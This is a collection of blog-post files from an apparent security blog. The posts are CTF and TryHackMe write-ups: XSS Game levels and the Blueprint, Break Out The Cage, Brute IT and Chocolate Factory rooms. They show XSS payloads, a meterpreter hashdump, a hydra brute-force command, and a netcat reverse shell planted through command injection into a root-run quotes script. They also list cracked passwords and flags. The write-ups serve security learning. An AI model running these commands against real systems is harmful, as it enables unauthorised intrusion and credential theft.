![](https://i.imgur.com/3fn414G.png) 22 | 23 | For the first one, this is pretty simple you just need to put some basic script tags with an alert() in it. 24 | 25 | ```javascript 26 |   27 | ``` 28 | 29 | ![](https://i.imgur.com/g1iQGRh.png) 30 | 31 | And there you go ! Your first challenge is done 👍 32 | 33 | # Level 2: Persistence is key 34 | 35 | ## Mission Description 36 | 37 | Web applications often keep user data in server-side and, increasingly, client-side databases and later display it to users. No matter where such user-controlled data comes from, it should be handled carefully. 38 | This level shows how easily XSS bugs can be introduced in complex apps. 
39 | 40 | ## Mission Objective 41 | 42 | Inject a script to pop up an alert() in the context of the application. 43 | Note: the application saves your posts so if you sneak in code to execute the alert, this level will be solved every time you reload it 44 | 45 | ![](https://i.imgur.com/oIs0vI9.png) 46 | 47 | So, for this one you need to put some kind of alert in the comment section. 48 | 49 | Let's do that ! 🥳 50 | 51 | ```javascript 52 | "> 53 | ``` 54 | 55 | Well, this is not JavaScript, is it? 56 | At first glance that’s true, but let me explain this sorcery 👀 57 | 58 | Basically, this payload escapes from the attribute and from the tag (so you end up in raw HTML) and then creates a new HTML tag to abuse 59 | 60 | ``` 61 | "> 88 | ``` 89 | 90 | This payload escapes from the following HTML 91 | 92 | ```html 93 |
    Image 1
    94 | ``` 95 | 96 | If we add the payload at the end, it will escape the ```'1'``` 97 | 98 | With : 99 | ``` 100 | '1''> 101 | ``` 102 | and the alert will show up ! 🥳 103 | 104 | ![](https://i.imgur.com/ujbTkDu.png) 105 | 106 | # Level 4: Context matters 107 | 108 | ## Mission Description 109 | 110 | Every bit of user-supplied data must be correctly escaped for the context of the page in which it will appear. This level shows why. 111 | 112 | ## Mission Objective 113 | 114 | Inject a script to pop up a JavaScript alert() in the application. 115 | 116 | ![](https://i.imgur.com/xUGG7Uz.png) 117 | 118 | This one is a little bit tricky, so let me explain it step by step 119 | 120 | First, we can try to break the onload handler by entering a single quote, for example 121 | 122 | ![](https://i.imgur.com/swwONYS.png) 123 | 124 | As you can see in the JavaScript console, we have triggered our first error (that's a good sign, don't worry 🥴): it means our quote ended up inside the handler's JavaScript without being escaped 125 | 126 | Now that we have triggered the error, what do we do next? 127 | 128 | Let's have a look at the source code here : 129 | ```html 130 | 131 | ``` 132 | https://xss-game.appspot.com/level4/frame?timer=3 133 | 134 | As in the previous challenges, we can break out of the startTime function call and inject our own function. Let's try that ! 
135 | 136 | ```javascript 137 | 3') || alert (' 138 | ``` 139 | You can find a lot of XSS payloads on different websites; the OWASP Prevention Cheat Sheet in the list below covers the defensive side, escaping data for the context it is written into 140 | 141 | ```text 142 | https://github.com/LasCC/Hack-Tools 143 | https://owasp.org/www-community/xss-filter-evasion-cheatsheet 144 | https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html 145 | https://portswigger.net/web-security/cross-site-scripting/cheat-sheet 146 | https://gist.github.com/kurobeats/9a613c9ab68914312cbb415134795b45 147 | https://edu.heibai.org/XSS-Cheat-Sheet-2019-Edition-2.pdf 148 | ``` 149 | 150 | ![](https://i.imgur.com/4fmxxQ7.png) 151 | 152 | -------------------------------------------------------------------------------- /src/content/blog/blueprint.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: "Blueprint - TryHackMe" 3 | category: "THM" 4 | pubDate: 2020-05-28 5 | description: "Writeup for the Blueprint on TryHackMe" 6 | --- 7 | [TryHackMe | Blueprint](https://tryhackme.com/room/blueprint) 8 | 9 | ![](https://webstockreview.net/images/win) 10 | 11 | Do you have what it takes to hack into this Windows Machine? 12 | 13 | `It might take around 3-4 minutes for the machine to boot.` 14 | 15 | ### Setup 16 | 17 | ``` 18 | ➜ TryHackMe nmap -A -vv 10.10.80.61 19 | ``` 20 | 21 | ``` 22 | PORT STATE SERVICE REASON VERSION 23 | 135/tcp open msrpc syn-ack Microsoft Windows RPC 24 | 25 | 139/tcp open netbios-ssn syn-ack Windows 7 Home Basic 7601 Service Pack 1 netbios-ssn 26 | 27 | 443/tcp open ssl/http syn-ack Apache httpd 2.4.23 (OpenSSL/1.0.2h PHP/5.6.28) 28 | | http-methods: 29 | |_ Supported Methods: GET HEAD POST OPTIONS 30 | |_http-server-header: Apache/2.4.23 (Win32) OpenSSL/1.0.2h PHP/5.6.28 31 | |_http-title: Bad request! 
32 | | ssl-cert: Subject: commonName=localhost 33 | | Issuer: commonName=localhost 34 | | Public Key type: rsa 35 | | Public Key bits: 1024 36 | | Signature Algorithm: sha1WithRSAEncryption 37 | | Not valid before: 2009-11-10T23:48:47 38 | | Not valid after: 2019-11-08T23:48:47 39 | | MD5: a0a4 4cc9 9e84 b26f 9e63 9f9e d229 dee0 40 | | SHA-1: b023 8c54 7a90 5bfa 119c 4e8b acca eacf 3649 1ff6 41 | | -----BEGIN CERTIFICATE----- 42 | | MIIBnzCCAQgCCQC1x1LJh4G1AzANBgkqhkiG9w0BAQUFADAUMRIwEAYDVQQDEwls 43 | | b2NhbGhvc3QwHhcNMDkxMTEwMjM0ODQ3WhcNMTkxMTA4MjM0ODQ3WjAUMRIwEAYD 44 | | VQQDEwlsb2NhbGhvc3QwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAMEl0yfj 45 | | 7K0Ng2pt51+adRAj4pCdoGOVjx1BmljVnGOMW3OGkHnMw9ajibh1vB6UfHxu463o 46 | | J1wLxgxq+Q8y/rPEehAjBCspKNSq+bMvZhD4p8HNYMRrKFfjZzv3ns1IItw46kgT 47 | | gDpAl1cMRzVGPXFimu5TnWMOZ3ooyaQ0/xntAgMBAAEwDQYJKoZIhvcNAQEFBQAD 48 | | gYEAavHzSWz5umhfb/MnBMa5DL2VNzS+9whmmpsDGEG+uR0kM1W2GQIdVHHJTyFd 49 | | aHXzgVJBQcWTwhp84nvHSiQTDBSaT6cQNQpvag/TaED/SEQpm0VqDFwpfFYuufBL 50 | | vVNbLkKxbK2XwUvu0RxoLdBMC/89HqrZ0ppiONuQ+X2MtxE= 51 | |_-----END CERTIFICATE----- 52 | |_ssl-date: TLS randomness does not represent time 53 | | tls-alpn: 54 | |_ http/1.1 55 | 56 | 3306/tcp open mysql syn-ack MariaDB (unauthorized) 57 | 58 | 8080/tcp open http syn-ack Apache httpd 2.4.23 (OpenSSL/1.0.2h PHP/5.6.28) 59 | | http-methods: 60 | | Supported Methods: GET HEAD POST OPTIONS TRACE 61 | |_ Potentially risky methods: TRACE 62 | |_http-server-header: Apache/2.4.23 (Win32) OpenSSL/1.0.2h PHP/5.6.28 63 | |_http-title: Index of / 64 | 49152/tcp open msrpc syn-ack Microsoft Windows RPC 65 | 49153/tcp open msrpc syn-ack Microsoft Windows RPC 66 | 49154/tcp open msrpc syn-ack Microsoft Windows RPC 67 | 49158/tcp open msrpc syn-ack Microsoft Windows RPC 68 | Service Info: Hosts: www.example.com, localhost; OS: Windows; CPE: cpe:/o:microsoft:windows 69 | 70 | Host script results: 71 | |_clock-skew: mean: -19m59s, deviation: 34m37s, median: 0s 72 | | nbstat: NetBIOS name: 
BLUEPRINT, NetBIOS user: , NetBIOS MAC: 02:05:ad:f5:e5:be (unknown) 73 | | Names: 74 | | BLUEPRINT<00> Flags: 75 | | WORKGROUP<00> Flags: 76 | | BLUEPRINT<20> Flags: 77 | | WORKGROUP<1e> Flags: 78 | | WORKGROUP<1d> Flags: 79 | | \x01\x02__MSBROWSE__\x02<01> Flags: 80 | | Statistics: 81 | | 02 05 ad f5 e5 be 00 00 00 00 00 00 00 00 00 00 00 82 | | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 83 | |_ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 84 | | p2p-conficker: 85 | | Checking for Conficker.C or higher... 86 | | Check 1 (port 41714/tcp): CLEAN (Couldnt connect) 87 | | Check 2 (port 54382/tcp): CLEAN (Couldnt connect) 88 | | Check 3 (port 22612/udp): CLEAN (Failed to receive data) 89 | | Check 4 (port 23038/udp): CLEAN (Timeout) 90 | |_ 0/4 checks are positive: Host is CLEAN or ports are blocked 91 | | smb-os-discovery: 92 | | OS: Windows 7 Home Basic 7601 Service Pack 1 (Windows 7 Home Basic 6.1) 93 | | OS CPE: cpe:/o:microsoft:windows_7::sp1 94 | | Computer name: BLUEPRINT 95 | | NetBIOS computer name: BLUEPRINT\x00 96 | | Workgroup: WORKGROUP\x00 97 | |_ System time: 2020-05-28T19:03:48+01:00 98 | | smb-security-mode: 99 | | account_used: guest 100 | | authentication_level: user 101 | | challenge_response: supported 102 | |_ message_signing: disabled (dangerous, but default) 103 | | smb2-security-mode: 104 | | 2.02: 105 | |_ Message signing enabled but not required 106 | | smb2-time: 107 | | date: 2020-05-28T18:03:50 108 | |_ start_date: 2020-05-28T18:03:02 109 | ``` 110 | 111 | ![](https://imgur.com/rUJpFMM.png) 112 | 113 | [osCommerce 2.3.4.1 - Remote Code Execution by DanielRTeixeira · Pull Request #9821 · rapid7/metasploit-framework](https://github.com/rapid7/metasploit-framework/pull/9821/files/b5681cb954bed6a1e64cf6708cbd5a937e596f5b) 114 | 115 | ![](https://imgur.com/nrRw0SU.png) 116 | 117 | ![](https://imgur.com/lecapcm.png) 118 | 119 | ### #1 "Lab" user NTML hash decrypted 120 | 121 | ``` 122 | meterpreter > run hashdump 123 | ``` 124 | 125 | 
![](https://imgur.com/J5xg1PX.png) 126 | 127 | ``` 128 | googleplus 129 | ``` 130 | 131 | ### #2 root.txt 132 | 133 | ``` 134 | meterpreter > shell 135 | C:\xampp\htdocs\oscommerce-2.3.4\catalog\install\includes> whoami 136 | nt authority\system 137 | C:\xampp\htdocs\oscommerce-2.3.4\catalog\install\includes> cd C:\User\Administrator\Desktop 138 | C:\xampp\htdocs\oscommerce-2.3.4\catalog\install\includes> type root.txt.txt 139 | THM{aea1e3ce6fe7f89e10cea833ae009bee} 140 | ``` 141 | 142 | 143 | -------------------------------------------------------------------------------- /src/content/blog/break-out-of-the-cage.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: "Break Out The Cage - TryHackMe" 3 | category: "THM" 4 | pubDate: 2020-06-18 5 | description: "Writeup for the Break Out The Cage room on TryHackMe" 6 | --- 7 | [TryHackMe | Break Out The Cage](https://tryhackme.com/room/breakoutthecage1) 8 | Let's find out what his agent is up to.... 
9 | 10 | --- 11 | 12 | ### Setup 13 | 14 | ``` 15 | ➜ TryHackMe nmap -A -vv 10.10.145.194 16 | ``` 17 | 18 | ``` 19 | 21/tcp open ftp syn-ack vsftpd 3.0.3 20 | | ftp-anon: Anonymous FTP login allowed (FTP code 230) 21 | |_-rw-r--r-- 1 0 0 396 May 25 23:33 dad_tasks 22 | | ftp-syst: 23 | | STAT: 24 | | FTP server status: 25 | | Connected to ::ffff:10.9.2.228 26 | | Logged in as ftp 27 | | TYPE: ASCII 28 | | No session bandwidth limit 29 | | Session timeout in seconds is 300 30 | | Control connection is plain text 31 | | Data connections will be plain text 32 | | At session startup, client count was 3 33 | | vsFTPd 3.0.3 - secure, fast, stable 34 | |_End of status 35 | 36 | 22/tcp open ssh syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) 37 | | ssh-hostkey: 38 | | 2048 dd:fd:88:94:f8:c8:d1:1b:51:e3:7d:f8:1d:dd:82:3e (RSA) 39 | | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDn+KLEDP81/6ceCvdFeDrLFYWSWc6UnOmmpiNeXuyr+GRvE5Eff4DOeTbiEIcHQkkPcz2QXiOLd9SMjCEgAqmZiZE/mv1HJpQfmRLOufOlf9oZ1TIZf7ehKcVqX0W3nuQeC+M2wLBse2lGhovnTSaZKLKRjQCP2yD1EzND/xFA88oFpahvr6vJfyGOTADjc83AJq9n3Gnil4Nd88xNsIKTl01Mm9ikE/3n/XFbwzYa2bYJRVr+lWWRd+EU3sYTY80PQgBiw6ZPT0QCe0lQfmcgCqu4hC+t/kyfmMRlbtjN/yZJ0gCWeVVAV+A4NNgsOqFbXUT+c6ATzYNhBXRojJED 40 | | 256 3e:ba:38:63:2b:8d:1c:68:13:d5:05:ba:7a:ae:d9:3b (ECDSA) 41 | | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBA3G1rdbZBOf44Cvz2YGtC5WhIHfHQhtShY8miCVHayvHM/9reA8VvLx9jBOa+iClhm/HairgvNV6pYV6Jg6MII= 42 | | 256 c0:a6:a3:64:44:1e:cf:47:5f:85:f6:1f:78:4c:59:d8 (ED25519) 43 | |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFiTPEbVpYmF2d/NDdhVYlXWA5PmTHhtrtlAaTiEuZOj 44 | 45 | 80/tcp open http syn-ack Apache httpd 2.4.29 ((Ubuntu)) 46 | | http-methods: 47 | |_ Supported Methods: POST OPTIONS HEAD GET 48 | |_http-server-header: Apache/2.4.29 (Ubuntu) 49 | |_http-title: Nicholas Cage Stories 50 | Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel 51 | ``` 52 | 53 | ``` 54 | ➜ TryHackMe dirb http://10.10.145.194/ -R 55 
| 56 | ----------------- 57 | DIRB v2.22 58 | By The Dark Raver 59 | ----------------- 60 | 61 | START_TIME: Mon Jun 15 10:10:41 2020 62 | URL_BASE: http://10.10.145.194/ 63 | WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt 64 | OPTION: Interactive Recursion 65 | 66 | ----------------- 67 | 68 | GENERATED WORDS: 4612 69 | 70 | ---- Scanning URL: http://10.10.145.194/ ---- 71 | ==> DIRECTORY: http://10.10.145.194/contracts/ 72 | ==> DIRECTORY: http://10.10.145.194/html/ 73 | ==> DIRECTORY: http://10.10.145.194/images/ 74 | ==> DIRECTORY: http://10.10.145.194/auditions/ 75 | + http://10.10.145.194/index.html (CODE:200|SIZE:2453) 76 | ==> DIRECTORY: http://10.10.145.194/scripts/ 77 | + http://10.10.145.194/server-status (CODE:403|SIZE:278) 78 | ``` 79 | 80 | ![](https://imgur.com/OszNOAo.png) 81 | 82 | As you can see by the title of the file, this mp3 is corrupted, so let's see if there is something hidden using steganography. 83 | 84 | ![](https://imgur.com/1VoGSx0.png) 85 | 86 | Yep ! There is something hidden in this file, the "password" is : namelesstwo 87 | 88 | ![](https://imgur.com/gN4KqtG.png) 89 | ![](https://imgur.com/eVBHL57.png) 90 | 91 | [Vigenère Cipher - Decoder, Encoder, Solver, Translator](https://www.dcode.fr/vigenere-cipher) 92 | 93 | ``` 94 | Dads Tasks - The RAGE...THE CAGE... THE MAN... THE LEGEND!!!! 95 | One. Revamp the website 96 | Two. Put more quotes in script 97 | Three. Buy bee pesticide 98 | Four. Help him with acting lessons 99 | Five. Teach Dad what "information security" is. 100 | 101 | In case I forget.... Mydadisghostrideraintthatcoolnocausehesonfirejokes 102 | ``` 103 | 104 | ### #1 What is Weston's password? 105 | 106 | ``` 107 | Mydadisghostrideraintthatcoolnocausehesonfirejokes 108 | ``` 109 | 110 | ### #2 What's the user flag? 111 | 112 | I tried to use the find command to locate all the txt files but nothing came out.. 
113 | 114 | ``` 115 | weston@national-treasure:~$ find / -type f -name "user.*" 2>/dev/null 116 | ``` 117 | 118 | Let's try something else .. 😢 119 | 120 | ![](https://imgur.com/B1Bb9kI.png) 121 | 122 | As you can see, there is a script here that we can execute with root permission, so let's get a reverse shell 🤤 123 | 124 | Wait ... 125 | 126 | ![](https://imgur.com/fe66YHv.png) 127 | 128 | When I was editing the script I noticed something interesting: there is a script that writes random quotes, so let's find that script 🤨 129 | 130 | You can also find the random quotes in the motd 131 | 132 | ![](https://imgur.com/iQWwMqZ.png) 133 | 134 | ``` 135 | weston@national-treasure:~$ find / -type f -name "rando*" 2>/dev/null 136 | ``` 137 | 138 | Nothing there.. 😟 139 | 140 | ``` 141 | weston@national-treasure:~$ find / -type f -name "*quotes*" 2>/dev/null 142 | ``` 143 | 144 | AH ! I found it! 😅 145 | 146 | ![](https://imgur.com/tUotgtl.png) 147 | 148 | ```python 149 | weston@national-treasure:~$ cat /opt/.dads_scripts/spread_the_quotes.py 150 | #!/usr/bin/env python 151 | 152 | #Copyright Weston 2k20 (Dad couldnt write this with all the time in the world!) 
153 | import os 154 | import random 155 | 156 | lines = open("/opt/.dads_scripts/.files/.quotes").read().splitlines() 157 | quote = random.choice(lines) 158 | os.system("wall " + quote) 159 | ``` 160 | 161 | The script glues a line from `.quotes` onto `wall` and passes the result to `os.system`, so a shell parses the file's contents; we can write to that file, which means a `;` in the quote runs a second command as whichever account runs the script. Let's get a reverse shell 162 | 163 | ``` 164 | rm -f /tmp/rev 165 | cat << EOF > /tmp/rev 166 | #!/bin/bash 167 | rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 10.9.2.228 4444 >/tmp/f 168 | EOF 169 | chmod +x /tmp/rev 170 | printf 'bop; /tmp/rev\n' > /opt/.dads_scripts/.files/.quotes 171 | ``` 172 | 173 | Wait maybe one or two minutes to get a shell 174 | 175 | ![](https://imgur.com/WBwzInV.png) 176 | 177 | ``` 178 | ls 179 | email_backup 180 | Super_Duper_Checklist 181 | cd Super* 182 | /bin/bash: line 30: cd: Super_Duper_Checklist: Not a directory 183 | cat Super* 184 | 1 - Increase acting lesson budget by at least 30% 185 | 2 - Get Weston to stop wearing eye-liner 186 | 3 - Get a new pet octopus 187 | 4 - Try and keep current wife 188 | 5 - Figure out why Weston has this etched into his desk: THM{M37AL_0R_P3N_T35T1NG} 189 | ``` 190 | 191 | ### #3 What's the root flag? 
192 | 193 | Once you are in the cage account, go to this directory 194 | 195 | ``` 196 | /home/cage/email_backup 197 | ``` 198 | 199 | And cat \* 200 | 201 | ![](https://imgur.com/oi1cWOc.png) 202 | 203 | After a while I figured out that the highlighted "password" is encoded with the Vigenère cipher 204 | 205 | But as you can see, you need to provide a key to decode the password. I tried "Face" because the last paragraph of the email repeats that word many times, so I guess I had some luck 🥴 206 | 207 | ![](https://imgur.com/junuXVj.png) 208 | 209 | [CyberChef]() 210 | 211 | ``` 212 | cageisnotalegend 213 | ``` 214 | 215 | You can also stabilize the shell using cage's SSH key 216 | 217 | ![](https://imgur.com/uWyHix4.png) 218 | 219 | Once you have stabilized the shell, you can just type "su" and enter the password that we discovered earlier 220 | 221 | ![](https://imgur.com/ibMOroe.png) 222 | 223 | ``` 224 | THM{8R1NG_D0WN_7H3_C493_L0N9_L1V3_M3} 225 | ``` 226 | 227 | 228 | -------------------------------------------------------------------------------- /src/content/blog/brute-it.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: "Brute IT - TryHackMe" 3 | category: "THM" 4 | pubDate: 2021-01-27 5 | description: "Learn how to brute, hash cracking and escalate privileges in this box!" 6 | --- 7 | [TryHackMe | Brute IT](https://tryhackme.com/room/bruteit) 8 | 9 | In this box you will learn about: 10 | 11 | - Brute-force 12 | - Hash cracking 13 | - Privilege escalation 14 | 15 | --- 16 | 17 | ## Before attacking, let's get information about the target 18 | 19 | ### Search for open ports using nmap, how many ports are open? 20 | 21 | ``` 22 | Desktop/TryHackMe/brut_it » nmap -A -vv 10.10.93.226 -oN nmap_result 23 | ``` 24 | 25 | ![](../images/bruteit/Untitled.png) 26 | 27 | ``` 28 | 2 ports are open. 29 | ``` 30 | 31 | ### What version of SSH is running? 
32 | 33 | ``` 34 | OpenSSH 7.6p1 35 | ``` 36 | 37 | ![](../images/bruteit/Untitled1.png) 38 | 39 | ### What version of Apache is running? 40 | 41 | ``` 42 | 2.4.29 43 | ``` 44 | 45 | ![](../images/bruteit/Untitled2.png) 46 | 47 | ### Which Linux distribution is running? 48 | 49 | ``` 50 | ubuntu 51 | ``` 52 | 53 | ![](../images/bruteit/Untitled3.png) 54 | 55 | ### Search for hidden directories on web server, what is the hidden directory? 56 | 57 | ``` 58 | Desktop/TryHackMe/brut_it » gobuster -u 10.10.93.226 -w /opt/directory-list-2.3-medium.txt 59 | ``` 60 | 61 | ![](../images/bruteit/Untitled4.png) 62 | 63 | ``` 64 | # Hidden directory 65 | /admin 66 | ``` 67 | 68 | --- 69 | 70 | ## Find a form to get a shell on SSH. 71 | 72 | ### What is the user:password of the admin panel? 73 | 74 | ![](../images/bruteit/Untitled5.png) 75 | 76 | As you can see, there is the user and password in the form data, we can use this to brute-force the login with hydra. 77 | 78 | Hidden message 79 | 80 | ![](../images/bruteit/Untitled6.png) 81 | 82 | ``` 83 | # Hydra command (Pretty straightforward) 84 | hydra -l admin -P /opt/rockyou.txt 10.10.93.226 http-post-form "/admin/index.php:user=^USER^&pass=^PASS^:Username or password invalid" 85 | ``` 86 | 87 | ![](../images/bruteit/Untitled7.png) 88 | 89 | ``` 90 | # Credentials 91 | admin:xavier 92 | ``` 93 | 94 | ### Crack the RSA key you found, what is John's RSA Private Key passphrase? 95 | 96 | ![](../images/bruteit/Untitled8.png) 97 | 98 | ``` 99 | # Password for the private key is 100 | rockinroll 101 | ``` 102 | 103 | ### user.txt 104 | 105 | ``` 106 | THM{a_password_is_not_a_barrier} 107 | ``` 108 | 109 | ![](../images/bruteit/Untitled9.png) 110 | 111 | ### Web flag 112 | 113 | ![](../images/bruteit/Untitled10.png) 114 | 115 | ``` 116 | THM{brut3_f0rce_is_e4sy} 117 | ``` 118 | 119 | --- 120 | 121 | ### Find a form to escalate your privileges, what is the root's password? 
122 | 123 | ``` 124 | # Password for the root user 125 | football 126 | ``` 127 | 128 | ![](../images/bruteit/Untitled11.png) 129 | 130 | ### Root.txt 131 | 132 | ``` 133 | THM{pr1v1l3g3_3sc4l4t10n} 134 | ``` 135 | 136 | ![](../images/bruteit/Untitled12.png) 137 | 138 | -------------------------------------------------------------------------------- /src/content/blog/chocolate-factory.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: "Chocolate Factory - TryHackMe" 3 | category: "THM" 4 | pubDate: 2021-01-22 5 | description: "This room was designed so that hackers can revisit the Willy Wonka's Chocolate Factory and meet Oompa Loompa" 6 | --- 7 | [TryHackMe | Chocolate Factory](https://tryhackme.com/room/chocolatefactory) 8 | 9 | 10 | **Welcome to Willy Wonka's Chocolate Factory!** 11 | 12 | ![https://i.pinimg.com/originals/01/86/9e/01869e0b2238d8307020d2c4503cec51.jpg](https://i.pinimg.com/originals/01/86/9e/01869e0b2238d8307020d2c4503cec51.jpg) 13 | 14 | This room was designed so that hackers can revisit the Willy Wonka's Chocolate Factory and meet Oompa Loompa 15 | 16 | This is a beginner friendly room! 17 | 18 | If you have any issues / queries you can reach us through [Discord](https://discord.gg/AC2Enww) or [Twitter.](https://twitter.com/andyinfosec_?lang=en) 19 | 20 | ( Created by [AndyInfosec](https://andyinfosec.com/) team for the community! 
) 21 | 22 | --- 23 | 24 | # Setup 25 | 26 | ``` 27 | TryHackMe/chocolate_factory » nmap -A --vv 10.10.239.0 28 | ``` 29 | 30 | ``` 31 | 21/tcp open ftp syn-ack vsftpd 3.0.3 32 | |_auth-owners: ERROR: Script execution failed (use -d to debug) 33 | | ftp-anon: Anonymous FTP login allowed (FTP code 230) 34 | |_-rw-rw-r-- 1 1000 1000 208838 Sep 30 14:31 gum_room.jpg 35 | | ftp-syst: 36 | | STAT: 37 | | FTP server status: 38 | | Connected to ::ffff:10.14.6.119 39 | | Logged in as ftp 40 | | TYPE: ASCII 41 | | No session bandwidth limit 42 | | Session timeout in seconds is 300 43 | | Control connection is plain text 44 | | Data connections will be plain text 45 | | At session startup, client count was 4 46 | | vsFTPd 3.0.3 - secure, fast, stable 47 | |_End of status 48 | 49 | 22/tcp open ssh syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) 50 | |_auth-owners: ERROR: Script execution failed (use -d to debug) 51 | | ssh-hostkey: 52 | | 2048 16:31:bb:b5:1f:cc:cc:12:14:8f:f0:d8:33:b0:08:9b (RSA) 53 | | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCuEAWoQHbW+vehIUZLTiJyXKjUAAJP0sgW/P0LHVaf4C5+1oEBXcDBBZC7SoL6MTMYn8zlEfhCbjQb7A/Yf2IxLzU5f35yuhEbWEvYmuP4PmBB04CJdDItU0xwAbGsufyzZ6td6LKm+oim8xJn/lVTeykVZTASF9iuY9tqwA933AfjqKlNByj82TAmlVkQ93bq+e7Gu/pRkSn++RkIUd4f8ogmLLusEh+vbGkZDj4UdwTIZbOSeuS4oz/umpkJPhekGVoyzjPMRIq9cwdeKIVRwUNbp4BoJjYKjbCC9YY8u/7O6lhtwo4uAp7Q9PfRRCiCpVimm6kIgBmgqqKbueDl 54 | | 256 e7:1f:c9:db:3e:aa:44:b6:72:10:3c:ee:db:1d:33:90 (ECDSA) 55 | | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBAYfNs0w6oOdzMM4B2JyB5pWr1qq9oB+xF0Voyn4gBYEGPC9+dqPudYagioH1ArjIHZFF0G24rt7L/6x1OPJSts= 56 | | 256 b4:45:02:b6:24:8e:a9:06:5f:6c:79:44:8a:06:55:5e (ED25519) 57 | |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIAwurtl1AFxJU7cHOfbCNr34YoTmAVnVUIXt4QHPD1B2 58 | 59 | 80/tcp open http syn-ack Apache httpd 2.4.29 ((Ubuntu)) 60 | |_auth-owners: ERROR: Script execution failed (use -d to debug) 61 | | http-methods: 62 | |_ Supported Methods: OPTIONS HEAD 
GET POST 63 | |_http-server-header: Apache/2.4.29 (Ubuntu) 64 | |_http-title: Site doesnt have a title (text/html). 65 | 100/tcp open newacct? syn-ack 66 | |_auth-owners: ERROR: Script execution failed (use -d to debug) 67 | | fingerprint-strings: 68 | | GenericLines, NULL: 69 | | Welcome to chocolate room!! 70 | | small hint from Mr.Wonka : Look somewhere else, its not here! ;) 71 | |_ hope you wont drown Augustus 72 | ``` 73 | 74 | Nice, we can see that there is a lot of ports open in that room, let's in the FTP with the anonymous login to see if there is something hidden in there 👀 75 | 76 | ![https://i.imgur.com/HmslKMI.png](https://i.imgur.com/HmslKMI.png) 77 | 78 | Well, as you can see there is a jpg file in the FTP server let's see if there is some kind of password in there. 79 | 80 | Well, I think this is a rabbit hole, let's continue with the website. 81 | 82 | ``` 83 | TryHackMe/chocolate_factory » gobuster -u http://10.10.239.0/ -w /opt/directory-list-2.3-medium.txt -x php 84 | ``` 85 | 86 | ``` 87 | Gobuster v1.3 OJ Reeves (@TheColonial) 88 | ===================================================== 89 | [+] Mode : dir 90 | [+] Url/Domain : http://10.10.239.0/ 91 | [+] Threads : 10 92 | [+] Wordlist : /opt/directory-list-2.3-medium.txt 93 | [+] Status codes : 302,307,200,204,301 94 | [+] Extensions : .php 95 | ===================================================== 96 | /home.php (Status: 200) 97 | ``` 98 | 99 | With the `-x php` we can tell at gobuster that we want only the .php extension and as you can see it worked! 100 | 101 | ![https://i.imgur.com/yNlNwIt.jpg](https://i.imgur.com/yNlNwIt.jpg) 102 | 103 | And of-course the only input contain an RCE 👍 104 | 105 | ![https://i.imgur.com/iiWEYxK.png](https://i.imgur.com/iiWEYxK.png) 106 | 107 | Let's create a reverse shell on the remote server. 
108 | 109 | ![https://i.imgur.com/MMWbLfw.png](https://i.imgur.com/MMWbLfw.png) 110 | 111 | #AD this is actually my own chrome extension to generate reverse-shells and many more cool things 😎 112 | 113 | ![https://i.imgur.com/IQ2eaE3.png](https://i.imgur.com/IQ2eaE3.png) 114 | 115 | And voilà! we have a reverse shell 🙌 116 | 117 | # Enter the key you found! 118 | 119 | ``` 120 | b'-VkgXhFf6sAEcAwrC6YR-SZbiuSb8ABXeQuvhcGSQzY=' 121 | ``` 122 | 123 | ![https://i.imgur.com/FlUXUYi.png](https://i.imgur.com/FlUXUYi.png) 124 | 125 | # What is Charlie's password? 126 | 127 | ``` 128 | cn7824 129 | ``` 130 | 131 | ![https://i.imgur.com/3o4JOjA.png](https://i.imgur.com/3o4JOjA.png) 132 | 133 | # Enter the user flag 134 | 135 | Unfortunately with the basic reverse shell I cannot su to the Charlie's account so I looked on the `/home/charlie` folder and i found a private SSH key 136 | 137 | ![https://i.imgur.com/24wrKP2.png](https://i.imgur.com/24wrKP2.png) 138 | 139 | ![https://i.imgur.com/1eChcjq.png](https://i.imgur.com/1eChcjq.png) 140 | 141 | ![https://i.imgur.com/5qcdkLc.png](https://i.imgur.com/5qcdkLc.png) 142 | 143 | And there you go! We have the access to the Charlie's account! 
144 | 145 | ``` 146 | chmod 600 [id_rsa] 147 | ssh -i id_rsa charlie@[ip] 148 | ``` 149 | 150 | ``` 151 | # Please reproduce the challenge its not that hard 👀 152 | flag{cd*********************d2e} 153 | ``` 154 | 155 | # Enter the root flag 156 | 157 | ![https://i.imgur.com/ce7yIjK.png](https://i.imgur.com/ce7yIjK.png) 158 | 159 | As you can see, charlie can run vi through sudo, and an editor that can start a shell keeps the privileges sudo gave it, so let's see if there is a privesc listed on GTFOBins 🥴 160 | 161 | ![https://i.imgur.com/ce7yIjK.png](https://i.imgur.com/ce7yIjK.png) 162 | 163 | ![https://i.imgur.com/VJLH9LZ.png](https://i.imgur.com/VJLH9LZ.png) 164 | 165 | ![https://i.imgur.com/P3FH1Dp.png](https://i.imgur.com/P3FH1Dp.png) 166 | 167 | ``` 168 | flag{cec*****************2124} 169 | ``` 170 | 171 | -------------------------------------------------------------------------------- /src/content/blog/daily-bugle.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: "Daily Bugle - TryHackMe" 3 | category: "THM" 4 | pubDate: 2021-01-28 5 | description: "Compromise a Joomla CMS account via SQLi, practise cracking hashes and escalate privileges." 
